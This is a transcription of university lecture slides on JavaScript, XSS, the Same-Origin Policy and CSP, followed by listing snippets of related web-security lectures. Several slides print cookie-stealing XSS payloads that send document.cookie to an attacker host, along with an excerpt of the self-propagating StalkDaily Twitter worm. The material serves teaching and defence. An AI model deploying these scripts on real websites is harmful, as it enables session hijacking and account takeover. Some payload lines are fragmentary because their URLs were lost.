Attacks on Clients: JavaScript & XSS
|
|
- Gordon Burns
- 6 years ago
- Views:
Transcription
1 Web Security Attacks on Clients: JavaScript & XSS (Section on JavaScript; on XSS) 1
2 Last week: attacks on the server Attacks on web server: attacker/client sends malicious input to server malicious input web server 2
3 This week: attacks on the client 1. from a web-server 2. by a link in an , Word document,... (2) web browser malicious output (1) web server Malicious input to the browser can abuse 'standard' security flaws that exist in browsers just like in any software, eg buffer overflows special features that browsers provide, eg JavaScript 3
4 Also: attacks on user via a benign server another user of the same website web server data base malicious input 4
5 'Generic' security flaws in browser software 5
6 Browser bugs Web browser gets untrusted input from web server incl. from third party web-sites Bugs in the browser can become exploitable vulnerabilities also bugs in browser add-ons, or other helper applications Classic Denial of Service (DoS) example: IE image crash image with huge size could crash Internet Explorer and freeze Windows machine <HTML><BODY> <img src= a.jpg width = height= > </BODY><HTML> Things get more interesting as browser gets more complex and powerful, and languages involved are more complex 6
7 Example client side problem 7
8 More dangerous browser bugs Denial of Service bugs are the least of your worries... Possibility of drive-by-downloads where just visiting a webpage can install malware, by exploiting security holes in browser, graphics libraries, media players,... Check nvd.nist.gov/vuln/search for security vulnerabilities in the web browser you use 8
9 Dynamic webpages (Sect & in book) 9
10 Recall: dynamic web pages Most web pages do not just contain static HTML, but are dynamic: ie they contain executable content. This is an interesting attack vector. execution aka processing client-side scripting web browser web server 10
11 Dynamic Content Languages for dynamic content: JavaScript part of HTML(5) standard Flash, Silverlight,... ActiveX Java... JavaScript is by far the most widespread of these technologies: nearly all web pages include JavaScript not part of HTML, so require browser add-on CSS (Cascading Style Sheets)defines layout of headers, links, etc. Not quite execution, but can be abused, and can contain JavaScript. 11
12 Dynamic Content Usage of client-side programming languages for websites (for top 10 million websites in Alexa popularity ranking) (source: 12
13 JavaScript & the DOM (Sect 7.1.3) 13
14 JavaScript JavaScript is the leading language used in client-side scripting embedded in web page to support client-side dynamic behaviour ie. executed in user's webbrowser reacting on events (eg keyboard) and interacting with webpage JavaScript has NOTHING to do with Java Typical uses: user interaction with the web page Eg opening and closing menus, changing pictures, providing a clientside editor for input... JavaScript code can completely rewrite the contents of an HTML page without connecting to the web server! client-side input validation Eg has the user entered a correct date, a syntactically correct address or credit card number, or a strong enough password? NB such validation should not be security critical! Why? Malicious client can by-pass such validation! 14
15 Recipe for security disaster? In a web browser we have all the classic ingredients for disaster untrusted executable JavaScript, coming from all over the web confidential information usernames, passwords, cookies, credit card numbers, content of s, any information entered in web forms,... sensitive functionality ability to , tweet, buy things, pay for things, Web-browser has become attractive place to attack! Unfortunately, JavaScript is so widely used that turning it off is not an option 15
16 JavaScript (Sect in book) Scripting language interpreted by browser, with code in the HTML <script type="text/javascript">... </script> optional, default is javascript Built-in functions eg to change content of the window <script> alert("hello World!"); </script> A web page can define additional functions <script>function hi(){alert( Hello World! );}</script> Built-in event handlers for reacting to user actions <img src="pic.jpg" onmouseover="javascript:hi()"> Example: NB try out this example & look at the code for exam. 16
17 DOM (Document Object Model) DOM is representation of the content of a webpage, in OO style Webpage is an object document with sub-objects, such as document.url, document.referer, document.cookie, 17
18 DOM (Document Object Model) JavaScript can interact with the DOM to access or change parts of the current webpage incl. text, URL, cookies,... This gives JavaScript its real power! Eg it allows scripts to change layout and content of the webpage, open and menus in the webpage,... Demo/example: NB try out this example & look at the code for exam. 18
19 Security features The user environment is protected from malicious JavaScript programs by a sand-boxing environment inside browser JavaScript programs are protected from each other by compartementalisation Same-Origin-Policy: code can only access resources with the same origin site (more on that later) Such protection has its limits... 19
20 HTML injection & XSS 20
21 Search engine example sos Search No matches found for sos Try this yourself at 21
22 Search engine example <h1>sos</h1> Search No matches found for sos 22
23 What proper input validation should produce <h1>sos</h1> Search No matches found for sos or <h1>sos</h1> Search No matches found for <h1>sos</h1> Here < and > written as < and > in the HTML source. So these special characters have been escaped to make them harmless 23
24 More complicated HTML code as search term? <img source=" <img source= Search No matches found for 24
25 More complicated HTML code as search term? <script language= text/javascript"> </script> alert( Hello World! ); <script langu Search Here we entered executable code (JavaScript) No matches found for Such HTML injection is called Cross Site Scripting (XSS) 25
26 HTML injection HTML injection: user input is echoed back to the client without validation or escaping But why is this a security problem? 1 simple HTML injection attacker can deface a webpage, with pop-ups, ads, or fake info <h1>us troops invade Syria</h1> <img=...> Such HTML injections abuses trust that a user has in a website: the user believes the content is from the website, when in fact it comes from an attacker 2 XSS the injected HTML contains executable content, typically JavaScript Execution of this code can have all sorts of nasty effects... 26
27 XSS (Cross Site Scripting) Attacker inject scripts into a website, such that scripts are passed on to a victim scripts are executed in the victim s browser with the victim s access rights with the victim s data incl. cookies interacting with the user, with the webpage (using the DOM), causing new HTTP requests,... Usually injected scripts are JavaScript, but could be Flash, ActiveX, Java,... 27
28 Stealing cookies with XSS Consider window.open( + document.cookie)</script> What if user clicks on this link? 1. browser goes to 2. website victim.com returns <HTML> Results for <script>...</script> </HTML> 3. browser executes script and sends mafia his cookie 28
29 XSS processing of malicious scripts malicious output incl. scripts browser web server unwanted requests another web server 29
30 Stealing cookies using XSS More stealthy way of stealing cookies <script> img = new Image(); img.src = + </script> encodeuri(document.cookie) Better because the user won t notice a change in the webpage when this script is executed, unlike the one on the previous page 30
31 Stealing cookies using XSS More stealthy way of stealing cookies <script> img = new Image(); img.src = + </script> encodeuri(document.cookie) Better because the user won t notice a change in the webpage when this script is executed, unlike the one on the previous page 31
32 Delivery mechanism for XSS Different ways for an attacker to get scripts on to the victim s browsers 1. Reflected aka non-persistent XSS 2. Stored aka persistent XSS 3. DOM-based XSS 32
33 Scenario 1: reflected XSS attack Attacker crafts a special URL for a vulnerable web site, often a URL containing JavaScript Attacker then tempts victim to click on this link by sending an that includes the link, or posting this link on a website 33
34 reflected aka non-persistent XSS malicious URL web server HTML containing malicious output 34
35 Example of reflected XSS attack Web Server Attacker User 3. XSS Attack by link in 7. Browser runs injected code; attacker obtains cookie 4. User clicks on XSS link 35
36 Scenario 2: stored XSS attack Attacker injects HTML - incl. scripts - into a web site, which is stored at that web site This is echoed back later when victim visit the same site Typical examples where attacker can try this some web forum a book review on amazon.com a posting on blackboard.ru.nl... Web2.0 web sites, which allow user-generated content, are ideal for this. 36
37 Stored aka persistent XSS attacker storing malicious content on website malicious input web server data base HTML containing malicious output another user of the same website 37
38 Scenario 3: DOM-based attack Attacker injects malicious content into a webpage via existing scripts in that webpage that interact with the DOM Eg, the javascript code <script> var pos=document.url.indexof("name=")+5; document.write(document.url.substring(pos,document.url.length)); </script> in webpage will copy name parameter from URL into that webpage Eg, for it will return Jan But what if the URL contains javascript in the name? eg An attacker can now use a malicious URL (as in a reflected attack) 38
39 Scenario 3: DOM-based attack The injected payload can for instance be in the URL Details depend on the browser eg. browser may encode < and > in URL A good web application might spot a malicious URL but...the server may be by-passed and never get to see the malicious payload! Part of the URL after # is not sent to bla.com, but is part of document.url So server-side validation can t help... 39
40 Examples of XSS attacks 40
41 Example: persistent XSS vulnerability via twitter 41
42 Example: persistent XSS attack via Google docs save as CSV file in spreadsheets.google.com some web browsers render this content as HTML, and execute the script! this then allows attacks on gmail.com, docs.google.com, code.google.com,.. because these all share the same cookie Is this the browser s fault, or the web-site s (ie google docs) fault? 42
43 Reflected XSS via error message Instead of search fields, error messages are also a well-known attack vector for reflected XSS Suppose returns a webpage with the error message "Resource foo is not found" Then </script> may return an error page with the script on it, and that script may then be executed by the browser 43
44 Included in twitter profile: Twitter StalkDaily worm <a href=" src=" >... where attack.js includes the following attack code var update = urlencode("hey everyone, join var ajaxconn = new XHConn();... ajaxconn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+ &tab=home&update=update"); var set = urlencode(' src=" </script><script src=" '); ajaxconn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+set+ &tab=home&update=update"); executed when you see this profile tweet the link change profile to include the attack code! 44
45 Same-Origin-Policy 45
46 Same-Origin-Policy (SOP) Idea: prevent (some) attacks by restricting interaction of HTML content coming from different origins. client browser twitter.com mafia.com 46
47 Same-Origin-Policy (SOP) Same-Origin-Policy intended to prevent attack from a malicious website on other web pages a user is interacting with Basic idea Scripts can only access information with same origin where origin is triple <URI scheme, address, port> eg <http, ru.nl, 80>, <https, ru.nl, 1080> HTML content belongs to origin where it was downloaded Scripts included in a HTML document have the origin of that document including them rationale: author of HTML page should know that scripts he includes are harmless See demos in and 47
48 Will SOP prevent cookie stealing? Suppose attacker injects cookie stealing script in blackboard.ru.nl Will the SOP prevent this script from accessing cookie? No! Scripts included in blackboard.ru.nl content will have access to the cookie of that domain. Even if the script is included via a link, such as <script src=" If the script is in an iframe downloaded from mafia.com, then it will not have access to the blackboard cookies 48
49 Circumventing the Same-Origin-Policy user s browser can t distinguish between good & bad scripts attacker uploads malicious content to twitter.com client browser attacker browser twitter.com mafia.com 49
50 Recap XSS involves attacker getting malicious (java)scripts in victim s browser, so that they are executed in the victim s browser with the victim s rights in the context of a web page from the attacked site Typical example: trying to steal cookies XSS is a special form of HTML injection the attacker injects HTML that happens to include scripts Different types of XSS: reflected or stored attack, or via DOM Same-Origin-Policy restricts some interactions but does not really prevent this 50
51 HTML injection vs SQL injection Common theme: attacker injects malicious data with special meaning, using special characters or words using ;... in SQL using <img> <script>... in HTML which are interpreted to have harmful consequence Difference: SQL injection is a server-side problem only HTML injection or XSS is client-side problem, but also a server-side problem, esp. in the case of stored/persistent XSS hence: not so clear who should or could solve the problem: the browser or the server? 51
52 Countermeasures against XSS 52
53 Input vs output problems? Is XSS due to lack of input validation or a lack of output validation 1. for reflected XSS attack? 2. for stored XSS attack? Should we do input validation or output validation to prevent XSS? Should the web browser or the server do this? Why not both? 53
54 input & output validation aka sanitisation browser output validation server input validation browser browser input validation server output validation web server data base Can the browser sanitise HTTP traffic to prevent XSS? by looking for suspicous content in outgoing HTTP requests or in incoming HTTP responses, which include the HTML code? Can the server sanitise HTTP traffic to prevent XSS? by looking for suspicous content in incoming HTTP requests or outgoing HTTP response, which include the HTML code? 54
55 Server-side validation Web server should validate aka escape aka sanitise HTML tags in any input received from the browser eg Blackboard can try to filter <script> tags in user input to a forum Some web servers use a separate web application firewall (waf) for this. Web server can also try to validate outgoing HTML, but it might be hard to spot at that stage which pieces of JavaScript are harmful Servers can also do validation when data is passed to or taken from the back-end database. However, sanitization is a never-ending cat & mouse game, with attackers always finding cleverer ways to obfuscate their malicious code To get an impression, see the depressingly long list of attackers tricks on 55
56 Example: by-passing server-side validation Suppose a web application does not allow use of / and attacker wants to include var s = new RegExp("http: myserver evilscr.js"); slash = location.href.charat(6); // code can now use slash to insert the slashes in s... i.e. JavaScript code copies the / from the URL (location.href) and then inserts this character in the right places in the string s 56
57 Other server-side countermeasures Additionally, the impact of having cookies can be reduced, eg by using tagged cookies include IP address in cookie disallow use of a cookie from a different IP address This prevents the use of a cookie by the attacker from another domain, but not abuse by javascript running in the victim's browser, as that comes from the original IP address Sandboxing options for iframes can be used to restrict what capabilities the content inside those iframes have 57
58 Sandboxing for iframes in HTML5 HTML5 introduced a sandbox option to restrict what an iframe can do Just turning on the sandbox with no further options <iframe sandbox src="..."> </iframe> will block imposes many restrictions, incl. no JavaScript can be executed pop-up windows are blocked sending of forms is blocked... These restrictions can be lifted one-by-one, eg <iframe sandbox allow-scripts allow-forms allow-pop-ups allow-same-origin src="..."> </ > For full list of options see 58
59 Client-side validation Browsers can try to protect against reflected XSS attacks by doing output sanitisation Eg if Chrome notices a script in a URL that is visited then it will not execute that script if it is included in the HTML result Trying to by-pass such defenses, and improving these defenses, is a never-ending cat-and-mouse game Browsers cannot protect against stored XSS attacks by doing input validation: It is hard/impossible for browser to tell which scripts are benign scripts from say blackboard, and which are malicious injected into blackboard by an attacker (unless CSP is used see later) 59
60 CSP (Content Security Policy) in HTML5 In a (Content-Security-Policy) HTTP header a website can provide a whitelist of scripts that the browser should allow Eg Content-Security-Policy: script-src 'self' only allows scripts inlined the HTML (self) scripts downloaded from apis.google.com to be executed Here the server gives the client some extra info so that the client can stop malicious scripts an attacker managed to inject. 60
61 CSP (Content Security Policy) Example evil script caught by CSP Warning: gettting CSP exactly right can be tricky, and some CSP policies turn out to be circumventable. 61
62 More client-side XSS protection Most browsers can block pop-up windows & multiple alerts Browser can disable scripts on a per-domain basis disallowing all script except those permitted by user disallowing all scripts on a public blacklist For example, NoScript extension of Firefox NotScripts and ScriptSafe extension of Chrome Ad-blocker plugins can also reduce the risk of XSS, as third party ads on website are a way for attackers to inject malicious content 62
63 More general dangers of JavaScript... 63
64 Windows Defender bug [CVE , May 9, 2017 (!) ] Some anti-virus solutions try to stop malicious JavaScript, by 1. looking for any JavaScript code in HTML s, IM, running this JavaScript in a sandbox, to see if it does anything strange Windows Defender does this, using the NScript JavaScript engine inside MsMpEng Malware protection engine Unfortunately... There was a bug in NScript... allowing malformed JavaScript to cause memory errors & take over a machine NScript runs at a very high privilige level Oops... Recall 'Defence in Depth' comment, about always running with minimal privilige level, from last week!
7.2.4 on Media content; on XSS) sws2 1
Software and Web Security 2 Attacks on Clients (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Last week: web server can be attacked by malicious input web browser web server
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationMore attacks on clients: Click-jacking/UI redressing, CSRF
Web Security More attacks on clients: Click-jacking/UI redressing, CSRF (Section 7.2.3 on Click-jacking; Section 7.2.7 on CSRF; Section 7.2.8 on Defenses against client-side attacks) 1 Recall from last
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationCS 161 Computer Security
Raluca Ada Popa Spring 2018 CS 161 Computer Security Discussion 9 Week of March 19, 2018 Question 1 Warmup: SOP (15 min) The Same Origin Policy (SOP) helps browsers maintain a sandboxed model by preventing
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationApplication Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.
Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers
More informationSoftware Security. Erik Poll. Digital Security group Radboud University Nijmegen
Tackling Software Security problems Erik Poll Digital Security group Radboud University Nijmegen 1 Erik Poll Recall: input attacks malicious input application a bug! malicious input application (abuse
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More information2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun
CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun Secure Coding String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationThe security of Mozilla Firefox s Extensions. Kristjan Krips
The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
More informationWeb Security: XSS; Sessions
Web Security: XSS; Sessions CS 161: Computer Security Prof. Raluca Ada Popa Mar 22, 2018 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh SQL Injection
More informationSecurity+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 3 Protecting Systems Objectives Explain how to harden operating systems List ways to prevent attacks through a Web browser Define
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationBrowser code isolation
CS 155 Spring 2016 Browser code isolation John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are
More informationWeb Security, Summer Term 2012
Table of Contents IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Presentation: Inject Javascript in a Page Javascript for manipulating
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationWeb Security, Summer Term 2012
IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation:
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More information2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.
Secure Coding CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationSoftware Security problems. Erik Poll. Digital Security group Radboud University Nijmegen
Software Security problems Erik Poll Digital Security group Radboud University Nijmegen Problems with Insecure input handling is the most common security problem aka lack of input validation, but that
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More informationOverview Cross-Site Scripting (XSS) Christopher Lam Introduction Description Programming Languages used Types of Attacks Reasons for XSS Utilization Attack Scenarios Steps to an XSS Attack Compromises
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationMTAT Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions
MTAT.07.019 Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions Kristjan Krips 1 Introduction Mozilla Firefox has 24.05% of the recorded usage share of web browsers as of October
More informationWeb Application Security
Web Application Security Rajendra Kachhwaha rajendra1983@gmail.com October 16, 2015 Lecture 16: 1/ 14 Outline Browser Security Principles: 1 Cross Site Scripting (XSS) 2 Types of XSS 3 Lecture 16: 2/ 14
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationWeb Security, Part 2
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationCNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2
CNIT 129S: Securing Web Applications Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2 Finding and Exploiting XSS Vunerabilities Basic Approach Inject this string into every parameter on every
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationCSC 482/582: Computer Security. Cross-Site Security
Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationMatch the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
More informationCS 161 Computer Security
Paxson Spring 2011 CS 161 Computer Security Discussion 6 March 2, 2011 Question 1 Cross-Site Scripting (XSS) (10 min) As part of your daily routine, you are browsing through the news and status updates
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationSome Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationWeb Security. Aggelos Kiayias Justin Neumann
Web Security Aggelos Kiayias Justin Neumann Dynamic HTML Umbrella term : HTML Javascript Cascading Style Sheets (CSS) Document Object Model (DOM) : a hierarchical structure API for accessing / manipulating
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationClient Side Security And Testing Tools
OWASP Jakarta Tech Day Meetup 2017 Client Side Security And Testing Tools David Cervigni @ Minded Security Agenda Short Intro Client side threats: Why important/difficult Examples: Dom XSS, HTTP Param
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationCross Site Request Forgery
Cross Site Request Forgery VULNERABILITY OVERVIEW WHITE PAPER PUBLIC Version: 1.0 By: Acadion Security URL: http://www.acadion.nl/ Date: February 6, 2013 Address: Koornmarkt 46 2611 EH Delft Nederland
More informationBOOSTING THE SECURITY
BOOSTING THE SECURITY OF YOUR ANGULAR APPLICATION Philippe De Ryck March 2017 https://www.websec.be ANGULAR APPLICATIONS RUN WITHIN THE BROWSER JS code HTML code Load application JS code / HTML code JS
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationWeb Security II. Slides from M. Hicks, University of Maryland
Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived
More informationEvaluating the Security Risks of Static vs. Dynamic Websites
Evaluating the Security Risks of Static vs. Dynamic Websites Ballard Blair Comp 116: Introduction to Computer Security Professor Ming Chow December 13, 2017 Abstract This research paper aims to outline
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
More informationWeb Security Computer Security Peter Reiher December 9, 2014
Web Security Computer Security Peter Reiher December 9, 2014 Page 1 Web Security Lots of Internet traffic is related to the web Much of it is financial in nature Also lots of private information flow around
More informationCSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum
ODDITIES Michele Spagnuolo Lukas Weichselbaum ABOUT US Michele Spagnuolo Lukas Weichselbaum Information Security Engineer Information Security Engineer We work in a special focus area of the Google security
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Midterm 1 Print your name:, (last) (first) I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that any academic misconduct will be reported
More informationCSC 405 Computer Security. Web Security
CSC 405 Computer Security Web Security Alexandros Kapravelos akaprav@ncsu.edu (Derived from slides by Giovanni Vigna and Adam Doupe) 1 Cross-Site Scripting (XSS) XSS attacks are used to bypass JavaScript's
More informationWeb Security. advanced topics on SOP. Yan Huang. Credits: slides adapted from Stanford and Cornell Tech
Web Security advanced topics on SOP Yan Huang Credits: slides adapted from Stanford and Cornell Tech Same Origin Policy protocol://domain:port/path?params Same Origin Policy (SOP) for DOM: Origin A can
More informationCS Paul Krzyzanowski
Original Browser Static content on clients Servers were responsible for dynamic parts Computer Security 14. Web Security Security attacks were focused on servers Malformed URLs, buffer overflows, root
More informationComputer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018
Computer Security 14. Web Security Paul Krzyzanowski Rutgers University Spring 2018 April 15, 2018 CS 419 2018 Paul Krzyzanowski 1 Original Browser Static content on clients Servers were responsible for
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationLECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security
Repetition Lect 7 LECT 8 WEB SECURITY Access control Runtime protection Trusted computing Java as basic model for signed code Trusted Computing Group TPM ARM TrustZone Mobile Network security GSM security
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture
More informationOWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP
